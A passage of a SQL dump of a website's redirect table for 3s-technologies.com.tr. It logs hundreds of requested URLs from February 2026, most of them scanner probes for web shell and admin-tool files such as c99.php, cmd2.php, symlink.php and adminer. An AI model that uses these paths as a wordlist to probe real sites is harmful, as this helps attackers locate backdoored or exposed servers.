00:00:00',301),(57151,'https://3s-technologies.com.tr/tr/wp-content/themes/index.php',NULL,'https://3s-technologies.com.tr/wp-content/themes/index.php','',2,0,'2026-02-10 07:27:31','0000-00-00 00:00:00',301),(57152,'https://3s-technologies.com.tr/tr/wp-content/uploads',NULL,'https://3s-technologies.com.tr/wp-content/uploads/','',2,0,'2026-02-10 07:27:31','0000-00-00 00:00:00',301),(57153,'https://3s-technologies.com.tr/tr/rip.php',NULL,'https://3s-technologies.com.tr/rip.php','',2,0,'2026-02-10 07:27:31','0000-00-00 00:00:00',301),(57154,'https://3s-technologies.com.tr/tr/wp-includes',NULL,'https://3s-technologies.com.tr/wp-includes/','',1,0,'2026-02-10 07:27:31','0000-00-00 00:00:00',301),(57155,'https://3s-technologies.com.tr/tr/wp-includes/phpmailer',NULL,'https://3s-technologies.com.tr/wp-includes/PHPMailer/','',1,0,'2026-02-10 07:27:31','0000-00-00 00:00:00',301),(57156,'https://3s-technologies.com.tr/tr/wp-includes/html-api',NULL,'https://3s-technologies.com.tr/wp-includes/html-api/','',1,0,'2026-02-10 07:27:32','0000-00-00 00:00:00',301),(57157,'https://3s-technologies.com.tr/tr/ioxi-o.php',NULL,'https://3s-technologies.com.tr/ioxi-o.php','',1,0,'2026-02-10 07:27:32','0000-00-00 00:00:00',301),(57158,'https://3s-technologies.com.tr/tr/uploads',NULL,'https://3s-technologies.com.tr/uploads/','',1,0,'2026-02-10 07:27:32','0000-00-00 00:00:00',301),(57159,'https://3s-technologies.com.tr/tr/adminfuns.php',NULL,'https://3s-technologies.com.tr/adminfuns.php','',3,0,'2026-02-10 07:27:33','0000-00-00 00:00:00',301),(57160,'https://3s-technologies.com.tr/tr/class-t.api.php',NULL,'https://3s-technologies.com.tr/class-t.api.php','',1,0,'2026-02-10 07:27:33','0000-00-00 00:00:00',301),(57161,'http://3s-technologies.com.tr/tr/cgi-bin/upfile.php',NULL,'','',1,0,'2026-02-10 12:11:17','0000-00-00 00:00:00',301),(57162,'http://3s-technologies.com.tr/tr/asax.php',NULL,'','',14,0,'2026-02-10 12:13:31','0000-00-00 00:00:00',301),(57163,'http://3s-technologies.com.tr/tr/hotel.php',NULL,'','',1,0,'2026-02-10 12:13:41','0000-00-00 00:00:00',301),(57164,'http://3s-technologies.com.tr/tr/js/adminer-3.5.1.php',NULL,'','',1,0,'2026-02-10 12:13:48','0000-00-00 00:00:00',301),(57165,'http://3s-technologies.com.tr/tr/akxjt.php',NULL,'','',1,0,'2026-02-10 12:13:49','0000-00-00 00:00:00',301),(57166,'http://3s-technologies.com.tr/tr/wp-act.php',NULL,'','',86,0,'2026-02-10 12:13:56','0000-00-00 00:00:00',301),(57167,'http://3s-technologies.com.tr/tr/wp-content/plugins/profile-builder/readme.txt',NULL,'','',12,0,'2026-02-10 12:26:42','0000-00-00 00:00:00',301),(57168,'http://mail.3s-technologies.com.tr/tr/8573.php',NULL,'','',25,0,'2026-02-10 12:50:29','0000-00-00 00:00:00',301),(57169,'http://mail.3s-technologies.com.tr/tr/zing.php',NULL,'','',1,0,'2026-02-10 12:50:30','0000-00-00 00:00:00',301),(57170,'http://mail.3s-technologies.com.tr/tr/ping.php',NULL,'','',1,0,'2026-02-10 12:50:31','0000-00-00 00:00:00',301),(57171,'http://mail.3s-technologies.com.tr/tr/p1ng.php',NULL,'','',1,0,'2026-02-10 12:50:33','0000-00-00 00:00:00',301),(57172,'http://mail.3s-technologies.com.tr/tr/gnip.php',NULL,'','',1,0,'2026-02-10 12:50:34','0000-00-00 00:00:00',301),(57173,'http://mail.3s-technologies.com.tr/tr/bugger.php',NULL,'','',3,0,'2026-02-10 12:50:35','0000-00-00 00:00:00',301),(57174,'http://mail.3s-technologies.com.tr/tr/columns.php',NULL,'','',1,0,'2026-02-10 12:50:37','0000-00-00 00:00:00',301),(57175,'http://mail.3s-technologies.com.tr/tr/wp-file.php',NULL,'','',12,0,'2026-02-10 12:50:37','0000-00-00 00:00:00',301),(57176,'http://mail.3s-technologies.com.tr/tr/dot.php',NULL,'','',1,0,'2026-02-10 12:50:38','0000-00-00 00:00:00',301),(57177,'http://mail.3s-technologies.com.tr/tr/fpvztega.php',NULL,'','',1,0,'2026-02-10 12:50:39','0000-00-00 00:00:00',301),(57178,'http://mail.3s-technologies.com.tr/tr/configure.php',NULL,'','',1,0,'2026-02-10 12:50:40','0000-00-00 00:00:00',301),(57179,'http://mail.3s-technologies.com.tr/tr/fucixwya.php',NULL,'','',1,0,'2026-02-10 12:50:41','0000-00-00 00:00:00',301),(57180,'http://mail.3s-technologies.com.tr/tr/env.php',NULL,'','',5,0,'2026-02-10 12:50:42','0000-00-00 00:00:00',301),(57181,'http://mail.3s-technologies.com.tr/tr/fai.php',NULL,'','',1,0,'2026-02-10 12:50:45','0000-00-00 00:00:00',301),(57182,'http://mail.3s-technologies.com.tr/tr/wp-express.php',NULL,'','',1,0,'2026-02-10 12:50:46','0000-00-00 00:00:00',301),(57183,'http://mail.3s-technologies.com.tr/tr/old-index.php',NULL,'','',3,0,'2026-02-10 12:50:47','0000-00-00 00:00:00',301),(57184,'http://mail.3s-technologies.com.tr/tr/export.php',NULL,'','',7,0,'2026-02-10 12:50:48','0000-00-00 00:00:00',301),(57185,'http://mail.3s-technologies.com.tr/tr/plugin-editor.php',NULL,'','',3,0,'2026-02-10 12:50:49','0000-00-00 00:00:00',301),(57186,'http://mail.3s-technologies.com.tr/tr/frontend_dev.php',NULL,'','',1,0,'2026-02-10 12:50:52','0000-00-00 00:00:00',301),(57187,'http://mail.3s-technologies.com.tr/tr/wp-act.php',NULL,'','',46,0,'2026-02-10 12:50:53','0000-00-00 00:00:00',301),(57188,'http://mail.3s-technologies.com.tr/tr/godsend.php',NULL,'','',1,0,'2026-02-10 12:50:56','0000-00-00 00:00:00',301),(57189,'http://mail.3s-technologies.com.tr/tr/wp-rocket.php',NULL,'','',1,0,'2026-02-10 12:50:57','0000-00-00 00:00:00',301),(57190,'http://mail.3s-technologies.com.tr/tr/info2.php',NULL,'','',1,0,'2026-02-10 12:51:01','0000-00-00 00:00:00',301),(57191,'http://mail.3s-technologies.com.tr/tr/h0110w4y.php',NULL,'','',1,0,'2026-02-10 12:51:03','0000-00-00 00:00:00',301),(57192,'http://mail.3s-technologies.com.tr/tr/ac2uzyno.php',NULL,'','',1,0,'2026-02-10 12:51:04','0000-00-00 00:00:00',301),(57193,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/seotheme/db.php',NULL,'','',1,0,'2026-02-10 12:51:05','0000-00-00 00:00:00',301),(57194,'http://mail.3s-technologies.com.tr/tr/apiuser_listing.php',NULL,'','',1,0,'2026-02-10 12:51:07','0000-00-00 00:00:00',301),(57195,'http://mail.3s-technologies.com.tr/tr/catuploadcsv.php',NULL,'','',1,0,'2026-02-10 12:51:08','0000-00-00 00:00:00',301),(57196,'http://mail.3s-technologies.com.tr/tr/upload_file.php',NULL,'','',2,0,'2026-02-10 12:51:09','0000-00-00 00:00:00',301),(57197,'http://mail.3s-technologies.com.tr/tr/ufdqlzwb.php',NULL,'','',1,0,'2026-02-10 12:51:11','0000-00-00 00:00:00',301),(57198,'http://mail.3s-technologies.com.tr/tr/edit-form-advanced.php',NULL,'','',1,0,'2026-02-10 12:51:12','0000-00-00 00:00:00',301),(57199,'http://mail.3s-technologies.com.tr/tr/insert_activity_db.php',NULL,'','',1,0,'2026-02-10 12:51:13','0000-00-00 00:00:00',301),(57200,'http://mail.3s-technologies.com.tr/tr/fnyeltio.php',NULL,'','',1,0,'2026-02-10 12:51:14','0000-00-00 00:00:00',301),(57201,'http://mail.3s-technologies.com.tr/tr/library.php',NULL,'','',1,0,'2026-02-10 12:51:15','0000-00-00 00:00:00',301),(57202,'http://mail.3s-technologies.com.tr/en/i3wfj.php',NULL,'','',1,0,'2026-02-10 12:51:17','0000-00-00 00:00:00',301),(57203,'http://mail.3s-technologies.com.tr/en/qcea0o9b.php',NULL,'','',1,0,'2026-02-10 12:51:18','0000-00-00 00:00:00',301),(57204,'http://mail.3s-technologies.com.tr/en/load-styles.php',NULL,'','',1,0,'2026-02-10 12:51:18','0000-00-00 00:00:00',301),(57205,'http://mail.3s-technologies.com.tr/en/htaccess.php',NULL,'','',1,0,'2026-02-10 12:51:19','0000-00-00 00:00:00',301),(57206,'http://mail.3s-technologies.com.tr/en/wp-content/content.php',NULL,'','',1,0,'2026-02-10 12:51:20','0000-00-00 00:00:00',301),(57207,'http://mail.3s-technologies.com.tr/en/indosec.php',NULL,'','',1,0,'2026-02-10 12:51:21','0000-00-00 00:00:00',301),(57208,'http://mail.3s-technologies.com.tr/en/o5filro2sh9.php',NULL,'','',1,0,'2026-02-10 12:51:22','0000-00-00 00:00:00',301),(57209,'http://mail.3s-technologies.com.tr/en/class-wp-admin-bar.php',NULL,'','',1,0,'2026-02-10 12:51:25','0000-00-00 00:00:00',301),(57210,'http://mail.3s-technologies.com.tr/en/.tmb/about.php',NULL,'','',1,0,'2026-02-10 12:51:26','0000-00-00 00:00:00',301),(57211,'http://mail.3s-technologies.com.tr/en/blkafewl.php',NULL,'','',1,0,'2026-02-10 12:51:27','0000-00-00 00:00:00',301),(57212,'http://mail.3s-technologies.com.tr/en/.wp-themes.php',NULL,'','',1,0,'2026-02-10 12:51:29','0000-00-00 00:00:00',301),(57213,'http://mail.3s-technologies.com.tr/en/ulc2.php',NULL,'','',1,0,'2026-02-10 12:51:30','0000-00-00 00:00:00',301),(57214,'http://mail.3s-technologies.com.tr/en/enigma.php',NULL,'','',1,0,'2026-02-10 12:51:31','0000-00-00 00:00:00',301),(57215,'http://mail.3s-technologies.com.tr/en/991176.php',NULL,'','',1,0,'2026-02-10 12:51:32','0000-00-00 00:00:00',301),(57216,'http://mail.3s-technologies.com.tr/en/thoms.php',NULL,'','',1,0,'2026-02-10 12:51:33','0000-00-00 00:00:00',301),(57217,'http://mail.3s-technologies.com.tr/en/comments.php',NULL,'','',1,0,'2026-02-10 12:51:34','0000-00-00 00:00:00',301),(57218,'http://mail.3s-technologies.com.tr/en/baxa1.php',NULL,'','',1,0,'2026-02-10 12:51:35','0000-00-00 00:00:00',301),(57219,'http://mail.3s-technologies.com.tr/en/add_actualites.php',NULL,'','',1,0,'2026-02-10 12:51:36','0000-00-00 00:00:00',301),(57220,'http://mail.3s-technologies.com.tr/en/tnt.php',NULL,'','',1,0,'2026-02-10 12:51:37','0000-00-00 00:00:00',301),(57221,'http://mail.3s-technologies.com.tr/en/wp-includes/css/index.php',NULL,'','',1,0,'2026-02-10 12:51:38','0000-00-00 00:00:00',301),(57222,'http://mail.3s-technologies.com.tr/en/jp.php',NULL,'','',1,0,'2026-02-10 12:51:39','0000-00-00 00:00:00',301),(57223,'http://mail.3s-technologies.com.tr/en/structure.php',NULL,'','',1,0,'2026-02-10 12:51:40','0000-00-00 00:00:00',301),(57224,'http://mail.3s-technologies.com.tr/en/options-writing.php',NULL,'','',1,0,'2026-02-10 12:51:41','0000-00-00 00:00:00',301),(57225,'http://mail.3s-technologies.com.tr/en/click.php',NULL,'','',1,0,'2026-02-10 12:51:44','0000-00-00 00:00:00',301),(57226,'http://mail.3s-technologies.com.tr/en/ezzbe3pmca6.php',NULL,'','',1,0,'2026-02-10 12:51:45','0000-00-00 00:00:00',301),(57227,'http://mail.3s-technologies.com.tr/en/gawean.php',NULL,'','',1,0,'2026-02-10 12:51:46','0000-00-00 00:00:00',301),(57228,'http://mail.3s-technologies.com.tr/en/symlink.php',NULL,'','',1,0,'2026-02-10 12:51:47','0000-00-00 00:00:00',301),(57229,'http://mail.3s-technologies.com.tr/en/cache.php',NULL,'','',1,0,'2026-02-10 12:51:48','0000-00-00 00:00:00',301),(57230,'http://mail.3s-technologies.com.tr/en/license.php',NULL,'','',1,0,'2026-02-10 12:51:49','0000-00-00 00:00:00',301),(57231,'http://mail.3s-technologies.com.tr/en/mysql-adminer.php',NULL,'','',1,0,'2026-02-10 12:51:50','0000-00-00 00:00:00',301),(57232,'http://mail.3s-technologies.com.tr/en/njwrdzrp.php',NULL,'','',1,0,'2026-02-10 12:51:51','0000-00-00 00:00:00',301),(57233,'http://mail.3s-technologies.com.tr/en/marijuana.php',NULL,'','',1,0,'2026-02-10 12:51:52','0000-00-00 00:00:00',301),(57234,'http://mail.3s-technologies.com.tr/en/robots.php',NULL,'','',1,0,'2026-02-10 12:51:53','0000-00-00 00:00:00',301),(57235,'http://mail.3s-technologies.com.tr/en/vv.php',NULL,'','',1,0,'2026-02-10 12:51:54','0000-00-00 00:00:00',301),(57236,'http://mail.3s-technologies.com.tr/en/hehe.php',NULL,'','',1,0,'2026-02-10 12:51:55','0000-00-00 00:00:00',301),(57237,'http://mail.3s-technologies.com.tr/en/doiconvs.php',NULL,'','',1,0,'2026-02-10 12:51:56','0000-00-00 00:00:00',301),(57238,'http://mail.3s-technologies.com.tr/en/adminer-4.6.2-cs.php',NULL,'','',1,0,'2026-02-10 12:51:57','0000-00-00 00:00:00',301),(57239,'http://mail.3s-technologies.com.tr/en/wp-includes/wp-includes_function.php',NULL,'','',1,0,'2026-02-10 12:51:58','0000-00-00 00:00:00',301),(57240,'http://mail.3s-technologies.com.tr/en/post-data.php',NULL,'','',1,0,'2026-02-10 12:51:59','0000-00-00 00:00:00',301),(57241,'http://mail.3s-technologies.com.tr/en/user.php',NULL,'','',1,0,'2026-02-10 12:52:00','0000-00-00 00:00:00',301),(57242,'http://mail.3s-technologies.com.tr/en/qpglkpgm.php',NULL,'','',1,0,'2026-02-10 12:52:02','0000-00-00 00:00:00',301),(57243,'http://mail.3s-technologies.com.tr/en/waplogin.php',NULL,'','',1,0,'2026-02-10 12:52:03','0000-00-00 00:00:00',301),(57244,'http://mail.3s-technologies.com.tr/en/tuny.php',NULL,'','',1,0,'2026-02-10 12:52:06','0000-00-00 00:00:00',301),(57245,'http://mail.3s-technologies.com.tr/en/adminer-4.5.0.php',NULL,'','',1,0,'2026-02-10 12:52:06','0000-00-00 00:00:00',301),(57246,'http://mail.3s-technologies.com.tr/en/wp-content/themes/deeto/login.php',NULL,'','',1,0,'2026-02-10 12:52:08','0000-00-00 00:00:00',301),(57247,'http://mail.3s-technologies.com.tr/en/media.php',NULL,'','',1,0,'2026-02-10 12:52:10','0000-00-00 00:00:00',301),(57248,'http://mail.3s-technologies.com.tr/en/todo.php',NULL,'','',1,0,'2026-02-10 12:52:11','0000-00-00 00:00:00',301),(57249,'http://mail.3s-technologies.com.tr/en/tccaepbk.php',NULL,'','',1,0,'2026-02-10 12:52:13','0000-00-00 00:00:00',301),(57250,'http://mail.3s-technologies.com.tr/en/jumpto.php',NULL,'','',1,0,'2026-02-10 12:52:14','0000-00-00 00:00:00',301),(57251,'http://mail.3s-technologies.com.tr/en/smm.php',NULL,'','',1,0,'2026-02-10 12:52:16','0000-00-00 00:00:00',301),(57252,'http://mail.3s-technologies.com.tr/en/wp-admin/network/subjects.php',NULL,'','',1,0,'2026-02-10 12:52:17','0000-00-00 00:00:00',301),(57253,'http://mail.3s-technologies.com.tr/en/ch.php',NULL,'','',1,0,'2026-02-10 12:52:18','0000-00-00 00:00:00',301),(57254,'http://mail.3s-technologies.com.tr/en/evil.php',NULL,'','',1,0,'2026-02-10 12:52:19','0000-00-00 00:00:00',301),(57255,'http://mail.3s-technologies.com.tr/en/nhybelpl.php',NULL,'','',1,0,'2026-02-10 12:52:20','0000-00-00 00:00:00',301),(57256,'http://mail.3s-technologies.com.tr/en/zmfm.php',NULL,'','',1,0,'2026-02-10 12:52:21','0000-00-00 00:00:00',301),(57257,'http://mail.3s-technologies.com.tr/en/gh.php',NULL,'','',1,0,'2026-02-10 12:52:22','0000-00-00 00:00:00',301),(57258,'http://3s-technologies.com.tr/tr/installation2',NULL,'','',1,0,'2026-02-10 20:19:29','0000-00-00 00:00:00',301),(57259,'http://3s-technologies.com.tr/tr/come.php',NULL,'','',4,0,'2026-02-10 20:48:33','0000-00-00 00:00:00',301),(57260,'http://3s-technologies.com.tr/tr/afnew.php',NULL,'','',3,0,'2026-02-10 20:48:37','0000-00-00 00:00:00',301),(57261,'http://3s-technologies.com.tr/tr/db-cache.php',NULL,'','',2,0,'2026-02-10 20:48:39','0000-00-00 00:00:00',301),(57262,'http://3s-technologies.com.tr/tr/eew.php',NULL,'','',2,0,'2026-02-10 20:49:35','0000-00-00 00:00:00',301),(57263,'http://3s-technologies.com.tr/tr/logging.php',NULL,'','',2,0,'2026-02-10 20:49:43','0000-00-00 00:00:00',301),(57264,'http://3s-technologies.com.tr/tr/dot.php',NULL,'','',2,0,'2026-02-10 20:49:43','0000-00-00 00:00:00',301),(57265,'http://3s-technologies.com.tr/tr/installation',NULL,'','',1,0,'2026-02-10 22:51:34','0000-00-00 00:00:00',301),(57266,'http://3s-technologies.com.tr/tr/nw.php',NULL,'','',63,0,'2026-02-11 02:19:29','0000-00-00 00:00:00',301),(57267,'http://3s-technologies.com.tr/tr/god.php',NULL,'','',18,0,'2026-02-11 02:19:30','0000-00-00 00:00:00',301),(57268,'http://3s-technologies.com.tr/tr/act.php',NULL,'','',4,0,'2026-02-11 02:19:30','0000-00-00 00:00:00',301),(57269,'http://3s-technologies.com.tr/tr/kj.php',NULL,'','',83,0,'2026-02-11 02:19:33','0000-00-00 00:00:00',301),(57270,'http://3s-technologies.com.tr/tr/login8.php',NULL,'','',9,0,'2026-02-11 02:19:36','0000-00-00 00:00:00',301),(57271,'http://3s-technologies.com.tr/tr/nnyvn.php',NULL,'','',6,0,'2026-02-11 02:19:37','0000-00-00 00:00:00',301),(57272,'http://3s-technologies.com.tr/tr/cu.php',NULL,'','',44,0,'2026-02-11 02:19:37','0000-00-00 00:00:00',301),(57273,'http://3s-technologies.com.tr/tr/lul.php',NULL,'','',6,0,'2026-02-11 02:19:38','0000-00-00 00:00:00',301),(57274,'http://3s-technologies.com.tr/tr/lp5.php',NULL,'','',6,0,'2026-02-11 02:19:39','0000-00-00 00:00:00',301),(57275,'http://3s-technologies.com.tr/tr/199.php',NULL,'','',3,0,'2026-02-11 02:20:16','0000-00-00 00:00:00',301),(57276,'https://3s-technologies.com.tr/tr/ms-edit.php',NULL,'https://3s-technologies.com.tr/ms-edit.php','',2,0,'2026-02-11 08:48:41','0000-00-00 00:00:00',301),(57277,'https://3s-technologies.com.tr/tr/wp-content/cache',NULL,'https://3s-technologies.com.tr/wp-content/cache/','',1,0,'2026-02-11 08:48:41','0000-00-00 00:00:00',301),(57278,'https://3s-technologies.com.tr/tr/wp-good.php',NULL,'https://3s-technologies.com.tr/wp-good.php','',1,0,'2026-02-11 08:48:42','0000-00-00 00:00:00',301),(57279,'https://3s-technologies.com.tr/tr/wp-content/upgrade',NULL,'https://3s-technologies.com.tr/wp-content/upgrade/','',2,0,'2026-02-11 08:48:42','0000-00-00 00:00:00',301),(57280,'https://3s-technologies.com.tr/tr/wp-content/languages/plugins',NULL,'https://3s-technologies.com.tr/wp-content/languages/plugins/','',1,0,'2026-02-11 08:48:42','0000-00-00 00:00:00',301),(57281,'https://3s-technologies.com.tr/tr/wp-includes/js/plupload',NULL,'https://3s-technologies.com.tr/wp-includes/js/plupload/','',2,0,'2026-02-11 08:48:42','0000-00-00 00:00:00',301),(57282,'https://3s-technologies.com.tr/tr/wp-includes/js/jquery/ui',NULL,'https://3s-technologies.com.tr/wp-includes/js/jquery/ui/','',1,0,'2026-02-11 08:48:42','0000-00-00 00:00:00',301),(57283,'http://3s-technologies.com.tr/tr/bvb.php',NULL,'','',2,0,'2026-02-11 11:15:50','0000-00-00 00:00:00',301),(57284,'http://3s-technologies.com.tr/tr/xqq.php',NULL,'','',50,0,'2026-02-11 11:15:51','0000-00-00 00:00:00',301),(57285,'http://3s-technologies.com.tr/tr/kolda.php',NULL,'','',8,0,'2026-02-11 11:15:52','0000-00-00 00:00:00',301),(57286,'http://3s-technologies.com.tr/tr/yos.php',NULL,'','',5,0,'2026-02-11 11:16:34','0000-00-00 00:00:00',301),(57287,'http://mail.3s-technologies.com.tr/tr/.info.php',NULL,'','',4,0,'2026-02-11 16:23:00','0000-00-00 00:00:00',301),(57288,'http://www.3s-technologies.com.tr/tr/adminfuns.php',NULL,'','',10,0,'2026-02-11 21:13:06','0000-00-00 00:00:00',301),(57289,'http://www.3s-technologies.com.tr/tr/zaa.php',NULL,'','',1,0,'2026-02-11 21:13:11','0000-00-00 00:00:00',301),(57290,'http://www.3s-technologies.com.tr/tr/gettest.php',NULL,'','',12,0,'2026-02-11 21:13:15','0000-00-00 00:00:00',301),(57291,'http://www.3s-technologies.com.tr/tr/fetch.php',NULL,'','',6,0,'2026-02-11 21:13:18','0000-00-00 00:00:00',301),(57292,'http://www.3s-technologies.com.tr/tr/errw.php',NULL,'','',1,0,'2026-02-11 21:13:37','0000-00-00 00:00:00',301),(57293,'http://www.3s-technologies.com.tr/tr/lp6.php',NULL,'','',1,0,'2026-02-11 21:13:49','0000-00-00 00:00:00',301),(57294,'http://www.3s-technologies.com.tr/tr/ap.php',NULL,'','',1,0,'2026-02-11 21:13:57','0000-00-00 00:00:00',301),(57295,'http://www.3s-technologies.com.tr/tr/geforce.php',NULL,'','',6,0,'2026-02-11 21:14:11','0000-00-00 00:00:00',301),(57296,'http://www.3s-technologies.com.tr/tr/environment.php',NULL,'','',1,0,'2026-02-11 21:14:22','0000-00-00 00:00:00',301),(57297,'http://www.3s-technologies.com.tr/tr/ole.php',NULL,'','',1,0,'2026-02-11 21:14:30','0000-00-00 00:00:00',301),(57298,'http://www.3s-technologies.com.tr/tr/ak.php',NULL,'','',3,0,'2026-02-11 21:14:33','0000-00-00 00:00:00',301),(57299,'http://www.3s-technologies.com.tr/tr/ellv3.php',NULL,'','',1,0,'2026-02-11 21:14:35','0000-00-00 00:00:00',301),(57300,'http://www.3s-technologies.com.tr/tr/ffd.php',NULL,'','',3,0,'2026-02-11 21:14:37','0000-00-00 00:00:00',301),(57301,'http://www.3s-technologies.com.tr/tr/x_3.php',NULL,'','',1,0,'2026-02-11 21:14:39','0000-00-00 00:00:00',301),(57302,'http://www.3s-technologies.com.tr/tr/wp_wlx.php',NULL,'','',1,0,'2026-02-11 21:14:40','0000-00-00 00:00:00',301),(57303,'http://www.3s-technologies.com.tr/tr/mal.php',NULL,'','',1,0,'2026-02-11 21:14:57','0000-00-00 00:00:00',301),(57304,'http://www.3s-technologies.com.tr/tr/ph33w.php',NULL,'','',1,0,'2026-02-11 21:15:01','0000-00-00 00:00:00',301),(57305,'http://www.3s-technologies.com.tr/tr/cv.php',NULL,'','',1,0,'2026-02-11 21:15:02','0000-00-00 00:00:00',301),(57306,'http://mail.3s-technologies.com.tr/tr/amp.php',NULL,'','',17,0,'2026-02-12 03:33:51','0000-00-00 00:00:00',301),(57307,'http://mail.3s-technologies.com.tr/tr/tfm.php',NULL,'','',38,0,'2026-02-12 03:34:00','0000-00-00 00:00:00',301),(57308,'http://mail.3s-technologies.com.tr/tr/ws66.php',NULL,'','',22,0,'2026-02-12 03:34:06','0000-00-00 00:00:00',301),(57309,'http://mail.3s-technologies.com.tr/tr/wp-blogs.php',NULL,'','',26,0,'2026-02-12 03:34:07','0000-00-00 00:00:00',301),(57310,'http://mail.3s-technologies.com.tr/tr/asax.php',NULL,'','',4,0,'2026-02-12 03:34:18','0000-00-00 00:00:00',301),(57311,'http://mail.3s-technologies.com.tr/tr/knmt.php',NULL,'','',5,0,'2026-02-12 03:34:19','0000-00-00 00:00:00',301),(57312,'http://mail.3s-technologies.com.tr/tr/mcs.php',NULL,'','',6,0,'2026-02-12 03:34:25','0000-00-00 00:00:00',301),(57313,'http://3s-technologies.com.tr/tr/luuuf.php',NULL,'','',1,0,'2026-02-12 09:58:24','0000-00-00 00:00:00',301),(57314,'http://3s-technologies.com.tr/tr/maraz.php',NULL,'','',6,0,'2026-02-12 09:58:24','0000-00-00 00:00:00',301),(57315,'http://3s-technologies.com.tr/tr/wp-k3w6g9s4h2.php',NULL,'','',13,0,'2026-02-12 09:58:27','0000-00-00 00:00:00',301),(57316,'http://3s-technologies.com.tr/tr/sldnjqlm.php',NULL,'','',1,0,'2026-02-12 09:58:29','0000-00-00 00:00:00',301),(57317,'http://3s-technologies.com.tr/tr/cmd2.php',NULL,'','',1,0,'2026-02-12 09:58:31','0000-00-00 00:00:00',301),(57318,'http://3s-technologies.com.tr/tr/qasfrhau.php',NULL,'','',1,0,'2026-02-12 09:58:31','0000-00-00 00:00:00',301),(57319,'http://3s-technologies.com.tr/tr/reujz.php',NULL,'','',1,0,'2026-02-12 09:58:34','0000-00-00 00:00:00',301),(57320,'http://3s-technologies.com.tr/tr/acfdr.php',NULL,'','',13,0,'2026-02-12 09:58:34','0000-00-00 00:00:00',301),(57321,'http://3s-technologies.com.tr/tr/kgmuq.php',NULL,'','',1,0,'2026-02-12 09:58:36','0000-00-00 00:00:00',301),(57322,'http://3s-technologies.com.tr/tr/pass4.php',NULL,'','',36,0,'2026-02-12 09:58:36','0000-00-00 00:00:00',301),(57323,'http://3s-technologies.com.tr/tr/fff.php',NULL,'','',72,0,'2026-02-12 09:58:37','0000-00-00 00:00:00',301),(57324,'http://3s-technologies.com.tr/tr/wfwdhsjo.php',NULL,'','',1,0,'2026-02-12 09:58:38','0000-00-00 00:00:00',301),(57325,'http://mail.3s-technologies.com.tr/tr/ioxi1.php',NULL,'','',1,0,'2026-02-12 11:47:16','0000-00-00 00:00:00',301),(57326,'http://mail.3s-technologies.com.tr/tr/capte.php',NULL,'','',2,0,'2026-02-12 11:47:18','0000-00-00 00:00:00',301),(57327,'http://mail.3s-technologies.com.tr/tr/fff.php',NULL,'','',35,0,'2026-02-12 11:47:21','0000-00-00 00:00:00',301),(57328,'https://3s-technologies.com.tr/tr/wp-admin/images',NULL,'https://3s-technologies.com.tr/wp-admin/images/','',1,0,'2026-02-12 22:16:52','0000-00-00 00:00:00',301),(57329,'https://3s-technologies.com.tr/tr/wp-admin/js/widgets',NULL,'https://3s-technologies.com.tr/wp-admin/js/widgets/','',1,0,'2026-02-12 22:16:52','0000-00-00 00:00:00',301),(57330,'https://3s-technologies.com.tr/tr/222.php',NULL,'https://3s-technologies.com.tr/222.php','',1,0,'2026-02-12 22:16:52','0000-00-00 00:00:00',301),(57331,'https://3s-technologies.com.tr/tr/wp-includes/js/tinymce/themes',NULL,'https://3s-technologies.com.tr/wp-includes/js/tinymce/themes/','',1,0,'2026-02-12 22:16:52','0000-00-00 00:00:00',301),(57332,'https://3s-technologies.com.tr/tr/wp-includes/js/jquery',NULL,'https://3s-technologies.com.tr/wp-includes/js/jquery/','',1,0,'2026-02-12 22:16:52','0000-00-00 00:00:00',301),(57333,'https://3s-technologies.com.tr/tr/wp-content/themes/twentytwentyfour',NULL,'https://3s-technologies.com.tr/wp-content/themes/twentytwentyfour/','',1,0,'2026-02-12 22:16:53','0000-00-00 00:00:00',301),(57334,'https://3s-technologies.com.tr/tr/sf.php',NULL,'https://3s-technologies.com.tr/sf.php','',1,0,'2026-02-12 22:16:53','0000-00-00 00:00:00',301),(57335,'https://3s-technologies.com.tr/tr/wp-content/themes/admin.php',NULL,'https://3s-technologies.com.tr/wp-content/themes/admin.php','',1,0,'2026-02-12 22:16:53','0000-00-00 00:00:00',301),(57336,'https://3s-technologies.com.tr/tr/wp-content/plugins/hello-dolly',NULL,'https://3s-technologies.com.tr/wp-content/plugins/hello-dolly/','',1,0,'2026-02-12 22:16:54','0000-00-00 00:00:00',301),(57337,'https://3s-technologies.com.tr/tr/wp-content/uploads/admin.php',NULL,'https://3s-technologies.com.tr/wp-content/uploads/admin.php','',1,0,'2026-02-12 22:16:54','0000-00-00 00:00:00',301),(57338,'https://3s-technologies.com.tr/tr/wp-content/languages',NULL,'https://3s-technologies.com.tr/wp-content/languages/','',1,0,'2026-02-12 22:16:54','0000-00-00 00:00:00',301),(57339,'http://3s-technologies.com.tr/tr/88.php',NULL,'','',7,0,'2026-02-13 01:07:57','0000-00-00 00:00:00',301),(57340,'http://3s-technologies.com.tr/tr/cvtcosue.php',NULL,'','',1,0,'2026-02-13 01:07:58','0000-00-00 00:00:00',301),(57341,'http://3s-technologies.com.tr/tr/aer.php',NULL,'','',2,0,'2026-02-13 01:08:00','0000-00-00 00:00:00',301),(57342,'http://3s-technologies.com.tr/tr/kma.php',NULL,'','',2,0,'2026-02-13 01:08:02','0000-00-00 00:00:00',301),(57343,'http://3s-technologies.com.tr/tr/kimono.php',NULL,'','',1,0,'2026-02-13 01:08:02','0000-00-00 00:00:00',301),(57344,'http://mail.3s-technologies.com.tr/tr/eetu.php',NULL,'','',6,0,'2026-02-13 01:59:26','0000-00-00 00:00:00',301),(57345,'http://mail.3s-technologies.com.tr/tr/lang/en.php',NULL,'','',1,0,'2026-02-13 01:59:27','0000-00-00 00:00:00',301),(57346,'http://mail.3s-technologies.com.tr/tr/se/name.php',NULL,'','',1,0,'2026-02-13 01:59:31','0000-00-00 00:00:00',301),(57347,'http://mail.3s-technologies.com.tr/tr/beence.php',NULL,'','',1,0,'2026-02-13 01:59:32','0000-00-00 00:00:00',301),(57348,'http://mail.3s-technologies.com.tr/tr/zfe.php',NULL,'','',2,0,'2026-02-13 01:59:34','0000-00-00 00:00:00',301),(57349,'http://mail.3s-technologies.com.tr/tr/elect.php',NULL,'','',1,0,'2026-02-13 01:59:37','0000-00-00 00:00:00',301),(57350,'http://mail.3s-technologies.com.tr/tr/shx.php',NULL,'','',3,0,'2026-02-13 01:59:37','0000-00-00 00:00:00',301),(57351,'http://mail.3s-technologies.com.tr/tr/index_w.php',NULL,'','',1,0,'2026-02-13 01:59:41','0000-00-00 00:00:00',301),(57352,'http://mail.3s-technologies.com.tr/tr/c99.php',NULL,'','',4,0,'2026-02-13 01:59:42','0000-00-00 